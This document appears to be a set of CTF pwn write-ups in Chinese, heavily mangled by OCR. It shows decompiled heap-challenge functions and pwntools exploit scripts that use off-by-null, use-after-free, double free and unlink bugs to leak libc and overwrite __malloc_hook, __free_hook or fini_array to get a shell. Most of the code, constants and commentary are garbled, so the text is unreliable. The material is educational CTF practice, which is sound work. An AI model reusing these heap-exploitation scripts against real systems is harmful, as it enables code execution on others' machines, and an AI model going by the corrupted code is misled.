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|int add()
i
| int 1; // [rsp+8h] [rbp-8h]
int v2; // [rsp+Ch] [rbp-4h]

| for (1 =0; 1<= 14 && gword 2020A8[1]; ++1 )

ooif (1> 14 )
) return puts("full");
| printf("len:");
v2 = sub_B8B();
if (v2<@ || vz > 1024 )
return puts(“"invalid");
qword_282eA8[1] = malloc(v2);
| printf("content:");
| sub_AEE(qword_2020A0[i], (unsigned int)v2);

'l dword 282868[1i] = v2;
| return puts("Done");

%15 chunk.
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show

int show()
{
int result; // eax
int v1; // [rsp+Ch] [rbp-4h]

printf("idx:");
vl = sub_B8B();
if ( vl >= @ & & vl <= 14 && gword_2020A8[v1] )
result = puts((const char *)gword_2020A8[v1]);
else
result = puts("invalid");
return result;

}
IE R
free
lint dele()
{
_DWORD *v@; // rax
int v2; // [rsp+Ch] [rbp-4h]
printf("idx:");
v2 = sub_B8B();
if (v2 >= 8 && v2 <= 14 && qword_2028A0[v2] )
{
free((void *)qword_2020A0[v2]);
qword_2028A8[v2] = OLL;
ve = dword_2020606;
dword_202060[v2] = @;
¥
else
{
LODWORD(ve) = puts("invalid");
¥
return (int)ve;
¥

free B2 7 (R IF AR UT



merge

for ( 1 = ©; 1 <= 14 && qword_2020A0[1]; ++1 )

if (1>14)
return puts("full");
printf("idx1:");
v2 = sub_B8B();
if (v2<0)
return puts("invalid");
if (v2 > 14 )
return puts("invalid"); |
if ( !qword_2@20AB[Vv2] )
return puts("invalid");
printf("idx2:");
v3 = sub_B8B();
if (v3 <@ || v3>14 || !'quord_2828A8[v3] )
return puts(“"invalid");
vd = dword_202860[v2] + dword_202060[v3];
qword_282eA8[1] = malloc(v4);
strcpy((char *)gword_2028A8[1], (const char *)qword_2028A8[v2]);
sircat((char *)qword_2020A8[1], (const char *)qword_2028A8[v3]);
dword_2@2068[1] = v4;
return puts(“"Done");
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from pwn import
context.log level
r remote( , 26562)
elf = ELF( )
libc ELF( )
one_gadget_ 18 [0x4f2c5,0x41322,0x10a38c |
def add(size, content):
r.sendlineafter( )
r.sendlineafter( 5 (size))

r.sendafter( , content)

def show(index):

r.sendlineafter( )

r.sendlineafter( (index))




r.sendlineafter(

r.sendlineafter( (index))

def merge(indexl, index2):
r.sendlineafter( 5
r.sendlineafter( (index1))

r.sendlineafter( (index2))

for i in (8):

add (0x89,

for i in
delete(i)

malloc_hook (ub4d(r.recvuntil( ). 1just(8, ) ) &oxf I ffffffffoeo) (libc.sym[
)
libc_base malloc_hook libc.sym[
free_hook libc_base libc.sym[
libc_base + libc.sym|[
(libc_base)

0x28 + p64(0x31) p64(free_hook) p64(0)

)

)
p64(system_addr)

r.interactive()
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add

for ( 1 = @; qword_2020AB[1]; ++i )

if (1<=9)

{
puts("Input the size:");
_1s0c99_scanf("%d", &vl);
if (vi<=@ || vi> 1023 )
{

puts(“Size error!");
¥

else
{
s = malloc(vl);
if (s)
{
memset(s, ©, vl);
qword_2020A0[1] s
dword_202066[1] = v1;
puts("Input the content:");
read(@, s, vl);
puts("Add success");
}

¥
¥

else

{
puts("The list is full");

}
g KB EAS AR



delete

unsigned __int64 delete()

{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __inté4 v2; // [rsp+8h] [rbp-8h]

v2 = _ readfsqword(©x28u);
puts("Input the index:");
vl = 8;
_is0c99_scanf("%d", &v1);
if (vl >= @ && vl <= 9 && qword_2820A0[Vv1] )
{
free((void *)qword_2020A0[Vv1]);
qword_2820A8[v1] = eLL;
dword_202060[v1] = ©;
puts("Delete success");

}

else

{
puts("Delete fail");

}

return __readfsqword(@x28u) " v2;
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update

int v1; // [rsp+Ch] [rbp-14h] BYREF
size_t nbytes; // [rsp+16h] [rbp-18h] BYREF
unsigned __int64 v3; // [rsp+18h] [rbp-8h]

v3 = __readfsqword(@x28u);
puts("Input the index:");
vl = @;
LODWORD(nbytes) =
_i1s0c99_scanf("%d", &v1);
if ( vl <= 9 && qword_2028A0[v1] )
{
puts("Input size:");
_is0c99 _scanf("%d", &nbytes);
if ( dword 262666[ 1] < (unsigned int)nbytes )
LODWORD dword 202060[vl];
puts( Input new content:");

HIDWORD(nbytes) = Pead(e (void *)qword_2e2eAe[v1], (unsigned int)nbytes);
if ( dword_202060[v1] = HIDNORD(rb rtes) )

puts("Edit fail");
¥

return _ readfsqword(@x28u) ~ v3;

AWt . A off by null.

Fr LB BRARTEM, ATk AR IR off by null, K ¥ show, ATLLEEEH10 fileskitZlibetiht, #lioverlap, HE47T M.

from pwn import

elf = ELF(

libc = ELF(

I0 2 1 stdout_s libc.sym[
malloc_hook_s libc.symbols|
one_gadget oxf1147

def add(size,content):
r.sendlineafter(
r.sendlineafter( 5 (size))
r.sendafter( ,content)

def delete(index):
r.sendlineafter(
r.sendlineafter( ) (index))

def edit(index, size, content):
r.sendlineafter( 5 )

r.sendlineafter( (index))




r.sendafter(

exp():

add (0x89,
add (ox68,
add (oxFo,
add(ox19,
delete(9)

edit(1,0x68, 0x60
delete(2)

add (0x89,

add (0x68,

add (oxFo,

delete(9)
edit(2,0x68, OXx60
delete(4)

delete(1)

add(ox89,

delete(9)

add (0x80+0x10+2,
add(ex68, )

, content)

p64(0x70 + 0x90))

p64(0x70 + 0x90))

Ox80 + p64(0) + p64(0x71) + pl6((2 << 12) + ((_IO0_2_1 stdout_s-0x43)

payload Ox33 + p64(OxOFBAD1887) +p64(0)*3 + p8(0x88)

add(0x59,payload)

libc_base ub4(sh.recv(6).1ljust(8, )) libc.symbols|

if libc_base 40

raise Exception(

OX7F:
)

malloc_hook_addr libc_base + malloc_hook_s

one_gadget_addr libc_base one_gadget

print 5
print

print

delete(1)

(libc_base)
) (malloc_hook_addr)
(one_gadget_addr)

edit(2,0x8,p64(malloc_hook addr - 0x23))

add(ex68, 'b")

add (0x60, ox13

r.sendlineafter(

r.sendlineafter(

while True:
try:
global r

r remote(

exp()
r.interactive()

except:
r.close()

print

p64(one_gadget addr))

, 29957)

OxFFF)))
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if ( (int)read(v3, &qword_662098, 8uLL) < @
] (close(v4), sub_4eeCA@(), _printf_chk(1LL, "please input your username:"), (int)read(@, &unk_ 602060, ox2eull) < @)
|| (_printf_chk(1LL, "please input your info:"), (int)read(®, &unk_6020A8, ©x20ulLlL) < @) )

{
puts("read error");
exit(e);

Wit 2 2 e mT LAfEbss A A —LE K75 .

v4 = _ readfsquord(©x28u);
if ( add_count )
1
puts("input the size");
if ( (int)read(e@, v3, 8ulLlL) < © )
goto LABEL_S8;
ve = strtol(v3, OLL, 10);
if ( ve > ex8e )
1
puts("invaild size");
exit(0);
}
vl = ve;
buf = (char *)malloc(ve);
puts(“please input your content");
if ( (int)read(@, buf, vl) < @ )
{
-ABEL_8:
puts(“read error");
exit(0);
}

--add_count;

}

else

{
puts(“chunk filled!\n");

puts("everything has a price");

}

return readfsaword(@x28u) ~ v4:

RZHIH10N, R KA G fastbin.

freefift & ELZICbUfIR Mreef, {HJ& BARE A IEEEFE 4T, W LA lkuafll X double free

show
puts(buf);
puts("everything has a price");
close(1l);
return close(2);
show | ] i 226 F
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v3 = __readfsqword(@x28u);

if ( !qword_6©2010 )

{
puts(“everything has a price");
goto LABEL_7;

¥
puts("build or free?");

if ( (int)read(@, v2, 8uLL) < @ )
{
LABEL_1@:
puts(“read error");
exit(@);

ptr = calloc(®xABuLL, 1uLlL);

puts("please input your content");

if ( (int)read(®, ptr, ©xAGuLL) >= © )
goto LABEL_7;

goto LABEL_19;

¥
if ((ve ==2)
free(ptr);
else
puts("invaild choice");
LABEL_7:
--qword_602018;
return __readfsqword(®x28u) " v3;
1
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puts("everything has a price");
goto LABEL_7;
}
puts("build or free?");
if ( (int)read(®, v2, 8ulLL) < @ )
{
LABEL_1@:
puts(“"read error");
exit(e);

ptr = calloc(@xA@uLL, 1uLl);
puts(“please input your content");
if ( (int)read(@, ptr, ©xAGuLL) >= @ )
goto LABEL_7;

goto LABEL_19;

}

if (vl == 2 )
free(ptr);

else
puts(“invaild choice");

LABEL_7:
--qword_602010;
return __readTtsqwor XZ8u) ™ v3;

KA R AT A A, PR EATA M =)z g, SBI0K, ANFTRL, 1, SR Jamt TRV 1, AR
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exp

from pwn import
context.log level

r remote( , 27054)

, p64(0) + p64(ex71))

r.sendlineafter( )

def add(size, content):
r.sendlineafter(
r.sendlineafter( (size))
r.sendafter( , content)

def delete():




r.sendlineafter(

show():

r.sendlineafter(

backdoor_1(content):
r.sendlineafter(
r.sendlineafter(

r.sendafter( , content)

backdoor_2():
r.sendlineafter(

r.sendlineafter(

add _b(size, content):
r.sendline( )
sleep(1)

r.sendline( (size))
sleep(1)
r.send(content)
sleep(1)

def delete b():
r.sendline(
sleep(1)

backdoor_1 b(content):
r.sendline( )
sleep(1)

r.sendline(

sleep(1)
r.send(content)
sleep(1)

backdoor_2 b():
r.sendline(
sleep(1)
r.sendline(

0x602060
elf.got|[

0x18 + p64(puts_got) + p64(@xDEADBEEFDEADBEEF) + p64(fake chunk)
add(0x60, p64(fake chunk))
s )

s )
payload)

ué4(r.recv(6).ljust(s,
puts_addr libc.sym[

libc_base libc.sym[




oxf1147

(libc_base)

0x23))

)

)
Oxb + p64(one_gadget) p64(realloc_addr + 0x14))

r.interactive()
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FATI KB new, K & Flichunk ¢ & .

if ( *(_QWORD *)(big_chunk + 8) < *(_QWORD

*IYbig_chunk )

{
for (1 =03 3 ++1 )
{
ve = *( QWORD *)big chunk;
if (1 >= *(_QWORD *)big_chunk )
break;
if ( !*(_QWORD *)(big_chunk + 24LL * i
{
printf("Length of new note: ");
v3 = getinput();
if (v3 >8)
{
if ( v3 > 4096 )
v3 = 40896;
v4 = malloc((128 - v3 % 128) % 128
printf("Enter your note: ");
sub_40e85D(v4, (unsigned int)v3);
*(_QWORD *)(big_chunk + 24LL * i +
*(_QWORD *)(big_chunk + 24LL * i +
*(_QWORD *)(big chunk + 24LL * i +

+ 16) )

+ v3);

16) = 1LL;

24) = v3;

32) = v4;

++!E_QWDRD *5!51g_chunk + 5);
LODWORD(v@) = puts("Done.");
¥

else

{

LODWORD(v@) = puts("Invalid length!");

h

return vo;
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256

num

list
unsigned int 1; // |[rsp+Ch] [rbp-4h]

if ( *(__inte4 *)(big_chunk + 8) <= 8 )
{
LODWORD(v@) = puts("You need to create some new notes first.");

¥

else |

{
for (1 =8; ; ++1 )
{
vl = *(_QWORD *)big_chunk;
if ( (int)i »= *(_QWORD *)big_chunk )
break;
if ( *(_QWORD *)(big_chunk + 24LL * (int)i + 16) == 1LL )
printf("%d. %s\n", i, *(const char **)(big_chunk + 24LL * (int)i + 32));

NG



edit

__inté4 vi; // rbx
int v2; // [rsp+4h] [rbp-1Ch]
int v3; // [rsp+8h] [rbp-18h]

printf("Note number: ");
v3 = getinput();
if (v3 <@ || v3 >= *(_QWORD *)big_chunk || *(_QWORD *)(big_chunk + 24LL * v3 + 16) != 1LL )
return puts("Invalid number!");
printf("Length of note: ");
v2 = getinput();
if (v2<=8)
return puts("Invalid length!");
if ((v2 > 4896 )
v2 = 4096;
if ( v2 != *(_QWORD *)(big_chunk + 24LL * v3 + 24) )
{
vl = big_chunk;
*(_QWORD *)(v1 + 24LL * v3 + 32) = realloc(*(void **)(big_chunk + 24LL * v3 + 32), (128 - v2 % 128) % 128 + v2);

M OonD TPl MR T 2JL e v 24, = v,

}

printf("Enter your note: ");

sub_48e85D(*(_QWORD *)(big_chunk + 24LL * v3 + 32), v2);
return puts(“Done."):

2R

reallocix HL b I o) B, K/NiX LR 285 5%, B Asgrealloc, 1EM & M2 S NFI KT AKKIchunk K/, 2B Sk /Y
chunk, %XJ5 HiF—AN K Hchunk, 3 [l 4N chunk ff) - o

reallocix HL 23t Jilivii H

free

if ( *(__inte4a *)(big_chunk + 8) <= © )
return puts("No notes yet.");
printf("Note number: ");
vl = getinput();
if (vl <@ || vi >= *(_QWORD *)big_chunk )
return puts("Invalid number!");
--*(_QWORD *)(big_chunk + 8);
*(_QWORD *)(big_chunk + 24LL * v1 + 16) = @LL;
*(_QWORD *)(big_chunk + 24LL * v1 + 24) = @LL;
free(*(void **)(big_chunk + 24LL * vl + 32));
return puts(“Done.");

KA s freedi b, (HEREN, K/NATEHE
IE

XA ERAN TR R IRk 2 uaf,  BRreallocid M MER H, FRELVT 248, reallocB4 2t fiidii i, A2 B4 —Fh oy =2
A1k E — Frealloc.

size == 0 , XAWHELE[H Tfree

realloc_ptr == 0 && size >0, X/MH {2 [R Fmalloc

malloc_usable_size(realloc_ptr) >= size, XM %5 [F Fedit
malloc_usable_size(realloc_ptr) < szie, XA A /Emalloc—#HE K ANTE, KRN AR 2, FEERFIchunks: free st
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exp

from pwn import
context.log level

remote( , 27906)

)

free_got = elf.got|

def add(size,content):
r.sendlineafter(




r.sendlineafter(
r.sendafter(

def free(index):
r.sendlineafter(
r.sendlineafter(

def show():
r.sendlineafter(

def edit(index,size,content):
.sendlineafter(
.sendlineafter(
.sendlineafter(
.sendafter(

add (0x80, 0x80
add (0x80, 0x80
add (0x80, 0x80

0x90
(payload),payload)

ub4(r.recvuntil(
heap_© 0x1a40
heap_© ox18
heap_© ox10
p64(0) + p64(0x80)
p64(fd) p64(bk)
payload.ljust(0x80,
p64(0x80)
(payload),payload)

p64(2) + p64(1)
p64(9) 9
payload.ljust(0x90,
(payload),payload)

ub4(r.recvuntil(
free - libc.sym[
libc_base

(libc_base)

payload
edit (9,

p64(system)
(payload),payload)

p64(0x90)

p64(0x8)

p64(1) + p64(8)

libc.sym[

»str(size))
,content)

)
(index))

)
(index))
,str(size))
,content)

:-1].1just(8,

p64(free_got)
p64(heap_4)
)

)[-6:].1just(8,

]

0x19a0




r.sendlineafter(

r.interactive()
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BATIR P U ENIE 1, RS SEE XD TR R RS T ERE.
[LiEpp iz

wniie ( L1 )

{
vl = SUb_89488E3();
if (vil=2)

break;

sub_80489E6();

¥

if (vl > 2)

{
if (vl ==3)

{ I
sub_8048A53();
}

else if ( vl == 4 )
{

}
¥
else if ( vl == 1)
{
sub_804890@B();
¥
¥

sub_804E6EQ(0);

DhREILAFHENG, REIFLF 1K



v2 = -1;
for (1 =9; 1 <= 15; ++1 )
{
if ( !dword_8@EBAG®[i + 16] )
{ -
v2 = 1;
break;
¥
¥
if ((v2 == -1)
sub_8B4EGEB(8);
dword_80EBAGB[v2] = sub_80488E3();
dword_80EBAGB[v2 + 16] = sub_S@SBBFb(dwor*d_SBEBABB[\32])_:
return sub_804887C(dword_8OEBA@O[v2 + 16], dword B8@EBA@@[v2]):;

XA Rt

+Emalloc.

2

nt sub_80489E6()

int result; // eax
int v1; // [esp+Ch] [ebp-Ch]

vl = sub_80488E3();

if ( !sub_8e489B1(v1) )
sub_B804EGE@(0);

dword_86EBAGG[v1] = ©;

sub_8059E00(dword_8@EBAGB[v1 + 16]);

result = vl + 16;

dword_8OEBAGG[v1 + 16] = ©;

return result;

RE TS IR TE, BfRHRk2delete.

int v@; // edx
int result; // eax
int v2; // [esp+Ch] [ebp-Ch]

v2 = sub_80488E3();
if ( !sub_80489B1(v2) )
sub_804EGEQ(0):
sub_8e4887C(dword_8eEBA@®[v2 + 16], dword_8eEBAee[v2]):
ve = sub_8e5BD20e(dword_8@EBAGO[v2 + 16]);
result = v2;
dword_86EBABB[v2] = ve;
return result;

XA edith s, REMSERTT
Fchunk K/, FAlIchunk & I R exgieaipdt 25, R — VOt il LELIEAE BT —ehunk K0, 31T BLEL F2unlink F] ] .



AT B BB 52 B0 ¥ finit_array, iUshellcodeS ANbssB, R Ja fEFLF IR AT .

exp

from pwn import
context(arch , log level

remote( , 28478)

bss_addr OXO80EAF80
content OX080EBA40
fini_array = Ox@80QE9F74

def add(size, content):
r.sendline( )
sleep(0.2)
r.sendline( (size))
sleep(0.2)
r.send(content)
sleep(0.2)

def delete(index):
r.sendline( )
sleep(0.2)
r.sendline( (index))
sleep(0.2)

def edit(index,content):
r.sendline( )
sleep(0.2)
r.sendline( (index))
sleep(0.2)
r.send(content)
sleep(0.2)

SENAKCETeD)

p32(9) p32(0x71) p32(content+0xc-0xc) p32(content+0xc-0x8) 0x60 + p32(0x70)
SENARCETeD)

p32(fini_array)




edit(0,p32(0x500)*6

p32(bss_addr)*2 p32(fini_array)

, payload)

asm(

shellcode+=asm(

shellcode+=asm(

, shellcode )
, p32(bss_addr)*2

r.interactive()
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